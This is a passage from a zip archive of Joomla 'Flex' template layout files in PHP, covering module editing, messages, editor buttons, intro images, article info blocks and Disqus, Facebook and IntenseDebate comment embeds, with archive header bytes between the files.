        $column->className = $column->className . ' hidden-xs';
    }
    //End Responsive Utilities

    if ($column->settings->column_type){ //Component
        $getLayout = new JLayoutFile('frontend.componentarea', $layout_path_carea );
        $output .= $getLayout->render($column);
    }
    else { // Module

        $getLayout = new JLayoutFile('frontend.modules', $layout_path_module );
        $output .= $getLayout->render($column);
    }
}

$output .= '</div>'; //.row

echo $output;
PK!�t
h
h
6flex/html/layouts/joomla/edit/frontediting_modules.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

// JLayout for standard handling of the edit modules:

$moduleHtml   = &$displayData['moduleHtml'];
$mod          = $displayData['module'];
$position     = $displayData['position'];
$menusEditing = $displayData['menusediting'];
$parameters   = JComponentHelper::getParams('com_modules');
$redirectUri  = '&return=' . urlencode(base64_encode(JUri::getInstance()->toString()));
$target       = '_blank';

if (preg_match('/<(?:div|span|nav|ul|ol|h\d) [^>]*class="[^"]* jmoddiv"/', $moduleHtml))
{
	// Module has already module edit button:
	return;
}

// Add css class jmoddiv and data attributes for module-editing URL and for the tooltip:
$editUrl = JUri::base() . 'administrator/index.php?option=com_modules&task=module.edit&id=' . (int) $mod->id;

if ($parameters->get('redirect_edit', 'site') === 'site')
{
	$editUrl = JUri::base() . 'index.php?option=com_config&controller=config.display.modules&id=' . (int) $mod->id . $redirectUri;
	$target  = '_self';
}

// Add class, editing URL and tooltip, and if module of type menu, also the tooltip for editing the menu item:
$count = 0;
$moduleHtml = preg_replace(
	// Replace first tag of module with a class
	'/^(\s*<(?:div|span|nav|ul|ol|h\d|section|aside|nav|address|article) [^>]*class="[^"]*)"/',
	// By itself, adding class jmoddiv and data attributes for the URL and tooltip:
	'\\1 jmoddiv" data-jmodediturl="' . $editUrl . '" data-target="' . $target . '" data-jmodtip="'
	.	JHtml::_('tooltipText', 
			JText::_('JLIB_HTML_EDIT_MODULE'),
			htmlspecialchars($mod->title, ENT_COMPAT, 'UTF-8') . '<br />' . sprintf(JText::_('JLIB_HTML_EDIT_MODULE_IN_POSITION'), htmlspecialchars($position, ENT_COMPAT, 'UTF-8')),
			0
		)
	. '"'
	// And if menu editing is enabled and allowed and it's a menu module, add data attributes for menu editing:
	.	($menusEditing && $mod->module === 'mod_menu' ?
			'" data-jmenuedittip="' . JHtml::_('tooltipText', 'JLIB_HTML_EDIT_MENU_ITEM', 'JLIB_HTML_EDIT_MENU_ITEM_ID') . '"'
			:
			''
		),
	$moduleHtml,
	1,
	$count
);

if ($count){
	// Load once booststrap tooltip and add stylesheet and javascript to head:
	//JHtml::_('bootstrap.tooltip');
	//JHtml::_('bootstrap.popover');

	JHtml::_('stylesheet', 'system/frontediting.css', array(), true);
	JHtml::_('script', 'system/frontediting.js', false, true);

	//Helix3
	helix3::addLess('frontend-edit', 'frontend-edit');
    helix3::addJS('frontend-edit.js');
}
PK!��	�+flex/html/layouts/joomla/system/message.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$msgList = $displayData['msgList'];

?>
<div id="system-message-container">
	<?php if (is_array($msgList) && !empty($msgList)) : ?>
		<div id="system-message">
			<?php foreach ($msgList as $type => $msgs) : ?>
				<div class="alert alert-<?php echo str_replace('alert-error', 'alert-error alert-danger', $type); ?>">
					<?php // This requires JS so we should add it trough JS. Progressive enhancement and stuff. ?>
					<a class="close" data-dismiss="alert">×</a>

					<?php if (!empty($msgs)) : ?>
						<h4 class="alert-heading"><?php echo JText::_($type); ?></h4>
						<div>
							<?php foreach ($msgs as $msg) : ?>
								<p><?php echo $msg; ?></p>
							<?php endforeach; ?>
						</div>
					<?php endif; ?>
				</div>
			<?php endforeach; ?>
		</div>
	<?php endif; ?>
</div>
PK!�41$$3flex/html/layouts/joomla/editors/buttons/button.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$button = $displayData;

?>
<?php if ($button->get('name')) : ?>
	<?php
		$class    = ($button->get('class')) ? $button->get('class') : null;
		$class	 .= ($button->get('modal')) ? ' modal-button' : null;
		$href     = ($button->get('link')) ? ' href="' . JUri::base() . $button->get('link') . '"' : null;
		$onclick  = ($button->get('onclick')) ? ' onclick="' . $button->get('onclick') . '"' : ' onclick="IeCursorFix(); return false;"';
		$title    = ($button->get('title')) ? $button->get('title') : $button->get('text');
	?>
	<a class="btn-primary <?php echo $class; ?>" title="<?php echo $title; ?>" <?php echo $href . $onclick; ?> rel="<?php echo $button->get('options'); ?>">
		<i class="fa fa-<?php echo $button->get('name'); ?>"></i> <?php echo $button->get('text'); ?>
	</a>
<?php endif;PK!'�Xee,flex/html/layouts/joomla/editors/buttons.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$buttons = $displayData;

// Load modal popup behavior
JHtml::_('behavior.modal', 'a.modal-button');
?>
<div id="editor-xtd-buttons" class="pull-left">
	<?php if ($buttons) : ?>
		<?php foreach ($buttons as $button) : ?>
			<?php echo JLayoutHelper::render('joomla.editors.buttons.button', $button); ?>
		<?php endforeach; ?>
	<?php endif; ?>
</div>PK!��a��1flex/html/layouts/joomla/tinymce/togglebutton.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$name = $displayData;

?>
<div class="toggle-editor btn-toolbar pull-right clearfix">
	<a class="btn sppb-btn-default" href="#"
		onclick="tinyMCE.execCommand('mceToggleEditor', false, '<?php echo $name; ?>');return false;"
		title="<?php echo JText::_('PLG_TINY_BUTTON_TOGGLE_EDITOR'); ?>"
	>
		<i class="fas fa-eye"></i> <?php echo JText::_('PLG_TINY_BUTTON_TOGGLE_EDITOR'); ?>
	</a>
</div>PK!=D���=flex/html/layouts/joomla/content/categories_default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';

$item = $displayData->item;
$items = $displayData->get('items');
$params = $displayData->params;
$extension = $displayData->get('extension');
$className = substr($extension, 4);
// This will work for the core components but not necessarily for other components
// that may have different pluralisation rules.
if (substr($className, -1) == 's')
{
	$className = rtrim($className, 's');
}
PK!�wU0flex/html/layouts/joomla/content/intro_image.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$tplParams 		= JFactory::getApplication()->getTemplate(true)->params;
$params  		= $displayData->params;
$attribs 		= json_decode($displayData->attribs);
$images 			= json_decode($displayData->images);
$imgsize 		= $tplParams->get('blog_list_image', 'default');
$intro_image 	= '';
// Include lazy load params
$has_lazyload = $tplParams->get('lazyload', 1);

if(isset($attribs->spfeatured_image) && $attribs->spfeatured_image != '') {

	if($imgsize == 'default') {
		$intro_image = $attribs->spfeatured_image;
	} else {
		$intro_image = $attribs->spfeatured_image;
		$basename = basename($intro_image);
		$list_image = JPATH_ROOT . '/' . dirname($intro_image) . '/' . JFile::stripExt($basename) . '_'. $imgsize .'.' . JFile::getExt($basename);
		if(file_exists($list_image)) {
			$intro_image = JURI::root(true) . '/' . dirname($intro_image) . '/' . JFile::stripExt($basename) . '_'. $imgsize .'.' . JFile::getExt($basename);
		}
	}
} elseif(isset($images->image_intro) && !empty($images->image_intro)) {
	$intro_image = $images->image_intro;
}

// Image alt (from Flex 3.8.3)
$intro_alt = ($images->image_intro_alt != '') ? $intro_alt = htmlspecialchars($images->image_intro_alt) : $intro_alt = htmlspecialchars($this->escape($displayData->title));

?>
<?php if(!empty($intro_image) || (isset($images->image_intro) && !empty($images->image_intro))) { ?>
<div class="entry-image intro-image">
	<?php if ($images->image_intro_caption) : echo '<div class="img-caption-overlay">'. htmlspecialchars($images->image_intro_caption) .'</div>'; endif; ?>
	<?php if ($params->get('link_titles') && $params->get('access-view')) { ?>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($displayData->slug, $displayData->catid, $displayData->language)); ?>">
	<?php } ?>
	<?php 
		if(strpos($intro_image, 'http://') !== false || strpos($intro_image, 'https://') !== false){
			if($has_lazyload && $tplParams->get('blog_layout') != 'masonry') { ?>
				<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $intro_image; ?>" alt="<?php echo $intro_alt; ?>">
			<?php } else { ?>
			<img src="<?php echo htmlspecialchars($intro_image); ?>" alt="<?php echo $intro_alt; ?>" itemprop="thumbnailUrl">
			<?php } 
			} else { 
			if($has_lazyload && $tplParams->get('blog_layout') != 'masonry') { ?>
				<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $intro_image; ?>" alt="<?php echo $intro_alt; ?>">
			<?php } else { ?>
			<img src="<?php echo htmlspecialchars($intro_image); ?>" alt="<?php echo $intro_alt; ?>" itemprop="thumbnailUrl">
			<?php }
		} ?>
	<?php if ($params->get('link_titles') && $params->get('access-view')) { ?>
		</a>
	<?php } ?>
</div>
<?php } ?>
PK!_�=�4flex/html/layouts/joomla/content/options_default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.framework');

?>
<fieldset class="<?php echo !empty($displayData->formclass) ? $displayData->formclass : 'form-horizontal'; ?>">
	<legend><?php echo $displayData->name ?></legend>
	<?php if (!empty($displayData->description)): ?>
		<p><?php echo $displayData->description; ?></p>
	<?php endif; ?>
	<?php
	$fieldsnames = explode(',', $displayData->fieldsname);
	foreach($fieldsnames as $fieldname)
	{
		foreach ($displayData->form->getFieldset($fieldname) as $field)
		{
			$classnames = 'control-group';
			$rel = '';
			$showon = $displayData->form->getFieldAttribute($field->fieldname, 'showon');
			if (!empty($showon))
			{
				JHtml::_('jquery.framework');
				JHtml::_('script', 'jui/cms.js', false, true);

				$id = $displayData->form->getFormControl();
				$showon = explode(':', $showon, 2);
				$classnames .= ' showon_' . implode(' showon_', explode(',', $showon[1]));
				$rel = ' rel="showon_' . $id . '['. $showon[0] . ']"';
			}
	?>
		<div class="<?php echo $classnames; ?>"<?php echo $rel; ?>>
			<?php if (!isset($displayData->showlabel) || $displayData->showlabel): ?>
				<div class="control-label"><?php echo $field->label; ?></div>
			<?php endif; ?>
			<div class="controls"><?php echo $field->input; ?></div>
		</div>
	<?php
		}
	}
?>
</fieldset>
PK!"D���6flex/html/layouts/joomla/content/comments/comments.phpnu&1i�<?php

//no direct access
defined('_JEXEC') or die('Restricted Access');

$params 	= JFactory::getApplication()->getTemplate(true)->params;

if( $params->get('commenting_engine') != 'disabled' ) {
	
	$url        =  JRoute::_(ContentHelperRoute::getArticleRoute($displayData->id . ':' . $displayData->alias, $displayData->catid, $displayData->language));
	$root       = JURI::base();
	$root       = new JURI($root);
	$url        = $root->getScheme() . '://' . $root->getHost() . $url;

	echo '<div id="sp-comments">';
	echo JLayoutHelper::render( 'joomla.content.comments.engine.comments.' . $params->get('commenting_engine'), array( 'item'=>$displayData, 'params'=>$params, 'url'=>$url ) );
	echo '</div><hr />';
}PK!u����<flex/html/layouts/joomla/content/comments/comments_count.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/

//no direct access
defined('_JEXEC') or die('Restricted Access');

$params 	= JFactory::getApplication()->getTemplate(true)->params;

if( ( $params->get('commenting_engine') != 'disabled' ) && ( $params->get('comments_count') ) ) {
	
	$url        =  JRoute::_(ContentHelperRoute::getArticleRoute($displayData['item']->id . ':' . $displayData['item']->alias, $displayData['item']->catid, $displayData['item']->language));
	$root       = JURI::base();
	$root       = new JURI($root);
	$url        = $root->getScheme() . '://' . $root->getHost() . $url;

	?>
	<dd class="comment">
		<i class="fa fa-comments-o"></i>
		<?php echo JLayoutHelper::render( 'joomla.content.comments.engine.count.' . $params->get('commenting_engine'), array( 'item'=>$displayData, 'params'=>$params, 'url'=>$url ) ); ?>
	</dd>
	<?php

}PK!'6�d��Hflex/html/layouts/joomla/content/comments/engine/count/intensedebate.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/
//no direct access
defined('_JEXEC') or die('Restricted Access');

if( $displayData['params']->get('intensedebate_acc') != '' ) {
	?>
	<span class="comments-anchor">
		<script type="text/javascript">
			var idcomments_acct = '<?php echo $displayData["params"]->get("intensedebate_acc"); ?>';
			var idcomments_post_id = '<?php echo md5( $displayData["url"] )?>';
			var idcomments_post_url = encodeURIComponent("<?php echo $displayData['url'];?>");
		</script>
		<script type="text/javascript" src="//www.intensedebate.com/js/genericLinkWrapperV2.js"></script>
	</span>
	<?php
}PK!7��A11Cflex/html/layouts/joomla/content/comments/engine/count/facebook.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/
//no direct access
defined('_JEXEC') or die('Restricted Access');

if( $displayData['params']->get('fb_appID') != '' ) {

	$doc = JFactory::getDocument();

	if(!defined('HELIX_COMMENTS_FACEBOOK_COUNT')) {

		$doc->addScript( '//connect.facebook.net/en-GB/all.js#xfbml=1&appId=' . $displayData['params']->get('fb_appID') . '&version=v2.0' );

		define('HELIX_COMMENTS_FACEBOOK_COUNT', 1);

	}

	?>

	<span class="comments-anchor">
		<a href="<?php echo $displayData['url']; ?>#sp-comments"><fb:comments-count href=<?php echo $displayData['url']; ?>> </fb:comments-count> <?php echo JText::_('FLEX_COMMENTS_COUNT'); ?></a>
	</span>

	<?php

}PK!�1���Aflex/html/layouts/joomla/content/comments/engine/count/disqus.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/

//no direct access
defined('_JEXEC') or die('Restricted Access');

if( $displayData['params']->get('disqus_subdomain') != '' ) {
	$doc = JFactory::getDocument();

	if(!defined('HELIX_COMMENTS_DISQUS_COUNT')) {
		ob_start();

		$devmode = $displayData['params']->get('disqus_devmode');
		if ($devmode) {
			echo 'var disqus_developer = "1";';
		}

		?>
		var disqus_shortname = '<?php echo $displayData['params']->get("disqus_subdomain"); ?>';
		(function () {
			var s = document.createElement('script'); s.async = true;
			s.type = 'text/javascript';
			s.src = '//' + disqus_shortname + '.disqus.com/count.js';
			(document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
		}());

		<?php

		$output = ob_get_clean();

		$doc->addScriptdeclaration( $output );

		define('HELIX_COMMENTS_DISQUS_COUNT', 1);

	}

	?>
	<span class="comments-anchor">
		<a href="<?php echo $displayData['url']; ?>#disqus_thread"></a>
	</span>
	<?php
}
PK!V��Ώ�Dflex/html/layouts/joomla/content/comments/engine/comments/disqus.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/

//no direct access
defined('_JEXEC') or die('Restricted Access');


if( $displayData['params']->get('disqus_subdomain') != '' ) {

	?>

	<div id="disqus_thread"></div>
	
	<script type="text/javascript">

	<?php
	$devmode = $displayData['params']->get('disqus_devmode');
	if ($devmode) {
		echo 'var disqus_developer = "1";';
	}
	?>

	var disqus_url= "<?php echo $displayData['url']; ?>";
	var disqus_identifier = "<?php echo md5( $displayData['url'] ); ?>";

	var disqus_shortname = '<?php echo $displayData["params"]->get("disqus_subdomain"); ?>';
	(function() {
		var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
		dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
		(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
	})();
	</script>
	<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>

	<?php

}PK!�-��Fflex/html/layouts/joomla/content/comments/engine/comments/facebook.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/
//no direct access
defined('_JEXEC') or die('Restricted Access');

if( $displayData['params']->get('fb_appID') != '' ) {
	?>

	<div id="fb-root"></div>
	<script>(function(d, s, id) {
		var js, fjs = d.getElementsByTagName(s)[0];
		if (d.getElementById(id)) return;
		js = d.createElement(s); js.id = id;
		js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=<?php echo $displayData['params']->get('fb_appID'); ?>&version=v2.0";
		fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));</script>

	<div class="fb-comments" data-href="<?php echo $displayData['url']; ?>" data-numposts="<?php echo $displayData['params']->get('fb_cpp'); ?>" data-width="<?php echo $displayData['params']->get('fb_width'); ?>" data-colorscheme="light"></div>
	
	<?php
}PK!.LJ���Kflex/html/layouts/joomla/content/comments/engine/comments/intensedebate.phpnu&1i�<?php
/**
* @author    JoomShaper http://www.joomshaper.com
* @copyright Copyright (C) 2010 - 2015 JoomShaper
* @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2
*/
//no direct access
defined('_JEXEC') or die('Restricted Access');

if( $displayData['params']->get('intensedebate_acc') != '' ) {
	?>
	
	<script>
	var idcomments_acct = '<?php echo $displayData["params"]->get("intensedebate_acc"); ?>';
	var idcomments_post_id = '<?php echo md5( $displayData["url"] ); ?>';
	var idcomments_post_url = '<?php echo $displayData["url"]; ?>';
	</script>
	<span id="IDCommentsPostTitle" style="display:none"></span>
	<script type='text/javascript' src='http://www.intensedebate.com/js/genericCommentWrapperV2.js'></script>

	<?php
}PK!X���00=flex/html/layouts/joomla/content/blog_style_default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<ol class="nav nav-tabs nav-stacked">
<?php foreach ($displayData->get('link_items') as $item) : ?>
	<li>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
			<?php echo $item->title; ?></a>
	</li>
<?php endforeach; ?>
</ol>
PK!Y�l��Bflex/html/layouts/joomla/content/blog_style_default_item_title.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$params = $displayData->params;
$canEdit = $displayData->params->get('access-edit');
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
?>
<?php if ($params->get('show_title') || $displayData->state == 0 || ($params->get('show_author') && !empty($displayData->author ))) : ?>
		<?php if ($params->get('show_title')) : ?>
			<h2 itemprop="name">
				<?php if ($params->get('link_titles') && $params->get('access-view')) : ?>
					<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($displayData->slug, $displayData->catid, $displayData->language)); ?>" itemprop="url">
					<?php echo $this->escape($displayData->title); ?></a>
				<?php else : ?>
					<?php echo $this->escape($displayData->title); ?>
				<?php endif; ?>
			</h2>
		<?php endif; ?>
		<?php if ($displayData->state == 0) : ?>
			<span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span>
		<?php endif; ?>
		<?php if (strtotime($displayData->publish_up) > strtotime(JFactory::getDate())) : ?>
			<span class="label label-warning"><?php echo JText::_('JNOTPUBLISHEDYET'); ?></span>
		<?php endif; ?>
		<?php if ((strtotime($displayData->publish_down) < strtotime(JFactory::getDate())) && $displayData->publish_down != JFactory::getDbo()->getNullDate()) : ?>
			<span class="label label-warning"><?php echo JText::_('JEXPIRED'); ?></span>
	<?php endif; ?>
<?php endif; ?>
PK!�{?u��1flex/html/layouts/joomla/content/associations.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

$items = $displayData;

if (!empty($items)) : ?>
	<ul class="item-associations">
		<?php foreach ($items as $id => $item) : ?>
				<li>
					<?php echo $item->link; ?>
				</li>
		<?php endforeach; ?>
	</ul>
<?php endif;
PK!��}���?flex/html/layouts/joomla/content/info_block/parent_category.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
<dd class="parent-category-name">
	<i class="fa fa-folder-o"></i>
	<?php $title = $this->escape($displayData['item']->parent_title); ?>
	<?php if ($displayData['params']->get('link_parent_category') && !empty($displayData['item']->parent_slug)) : ?>
		<?php echo '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($displayData['item']->parent_slug)) . '" itemprop="genre" data-toggle="tooltip" title="' . JText::sprintf('COM_CONTENT_PARENT', '') . '">' . $title . '</a>'; ?>
	<?php else : ?>
		<?php echo '<span itemprop="genre" data-toggle="tooltip" title="' . JText::sprintf('COM_CONTENT_PARENT', '') . '">' . $title . '</span>'; ?>
	<?php endif; ?>
</dd>PK!5�QQ;flex/html/layouts/joomla/content/info_block/create_date.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;

?>
<dd class="create">
	<i class="far fa-calendar-alt"></i>
	<time datetime="<?php echo JHtml::_('date', $displayData['item']->created, 'c'); ?>" itemprop="dateCreated" data-toggle="tooltip" title="<?php echo JText::_('COM_CONTENT_CREATED_DATE'); ?>">
		<?php echo JHtml::_('date', $displayData['item']->created, JText::_('DATE_FORMAT_LC3')); ?>
	</time>
</dd>PK!���YY;flex/html/layouts/joomla/content/info_block/modify_date.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;

?>
<dd class="modified">
	<i class="far fa-calendar-check"></i>
	<time datetime="<?php echo JHtml::_('date', $displayData['item']->modified, 'c'); ?>" itemprop="dateModified" data-toggle="tooltip" title="<?php echo JText::_('COM_CONTENT_MODIFIED_DATE'); ?>">
		<?php echo JHtml::_('date', $displayData['item']->modified, JText::_('DATE_FORMAT_LC3')); ?>
	</time>
</dd>PK!���8flex/html/layouts/joomla/content/info_block/category.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;

?>
<dd class="category-name">
	<i class="far fa-folder-open"></i>
	<?php $title = $this->escape($displayData['item']->category_title); ?>
	<?php if ($displayData['params']->get('link_category') && $displayData['item']->catslug) : ?>
		<?php echo '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($displayData['item']->catslug)) . '" itemprop="genre" data-toggle="tooltip" title="' . JText::_('COM_CONTENT_CONTENT_TYPE_CATEGORY') . '">' . $title . '</a>'; ?>
	<?php else : ?>
		<?php echo '<span itemprop="genre" itemprop="genre" data-toggle="tooltip" title="' . JText::_('COM_CONTENT_CONTENT_TYPE_CATEGORY') . '">' . $title . '</span>'; ?>
	<?php endif; ?>
</dd>PK!3H�VYY<flex/html/layouts/joomla/content/info_block/publish_date.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;
?>
<dd class="published">
	<i class="far fa-calendar"></i>
	<time datetime="<?php echo JHtml::_('date', $displayData['item']->publish_up, 'c'); ?>" itemprop="datePublished" data-toggle="tooltip" title="<?php echo JText::_('COM_CONTENT_PUBLISHED_DATE'); ?>">
		<?php echo JHtml::_('date', $displayData['item']->publish_up, JText::_('DATE_FORMAT_LC3')); ?>
	</time>
</dd>PK!�����4flex/html/layouts/joomla/content/info_block/hits.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined('JPATH_BASE') or die;

?>
<dd class="hits">
	<i class="far fa-eye"></i>
	<meta itemprop="interactionCount" content="UserPageVisits:<?php echo $displayData['item']->hits; ?>" />
	<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $displayData['item']->hits); ?>
</dd>PK!�J!		5flex/html/layouts/joomla/content/info_block/block.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;

$blockPosition = $displayData['params']->get('info_block_position', 0);

?>
	<dl class="article-info">

		<?php if ($displayData['position'] == 'above' && ($blockPosition == 0 || $blockPosition == 2)
				|| $displayData['position'] == 'below' && ($blockPosition == 1)
				) : ?>

			<dt class="article-info-term"></dt>	
				
			<?php if ($displayData['params']->get('show_author') && !empty($displayData['item']->author )) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.author', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_parent_category') && !empty($displayData['item']->parent_slug)) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.parent_category', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_category')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.category', $displayData); ?>
			<?php endif; ?>

			<?php echo JLayoutHelper::render('joomla.content.comments.comments_count', $displayData); //Helix Comment Count ?>

			<?php if ($displayData['params']->get('show_publish_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.publish_date', $displayData); ?>
			<?php endif; ?>

		<?php endif; ?>

		<?php if ($displayData['position'] == 'above' && ($blockPosition == 0)
				|| $displayData['position'] == 'below' && ($blockPosition == 1 || $blockPosition == 2)
				) : ?>
			<?php if ($displayData['params']->get('show_create_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.create_date', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_modify_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.modify_date', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_hits')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.hits', $displayData); ?>
			<?php endif; ?>
		<?php endif; ?>

		<?php echo JLayoutHelper::render('joomla.content.rating', $displayData) ?>

	</dl>
PK!���m��6flex/html/layouts/joomla/content/info_block/author.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined('JPATH_BASE') or die;

?>
<dd class="createdby" itemprop="author" itemscope itemtype="http://schema.org/Person">
	<i class="fas fa-user"></i>
	<?php $author = ($displayData['item']->created_by_alias ? $displayData['item']->created_by_alias : $displayData['item']->author); ?>
	<?php $author = '<span itemprop="name" data-toggle="tooltip" title="' . JText::sprintf('COM_CONTENT_WRITTEN_BY', '') . '">' . $author . '</span>'; ?>
	<?php if (!empty($displayData['item']->contact_link ) && $displayData['params']->get('link_author') == true) : ?>
		<?php echo JHtml::_('link', $displayData['item']->contact_link, $author, array('itemprop' => 'url')); ?>
	<?php else :?>
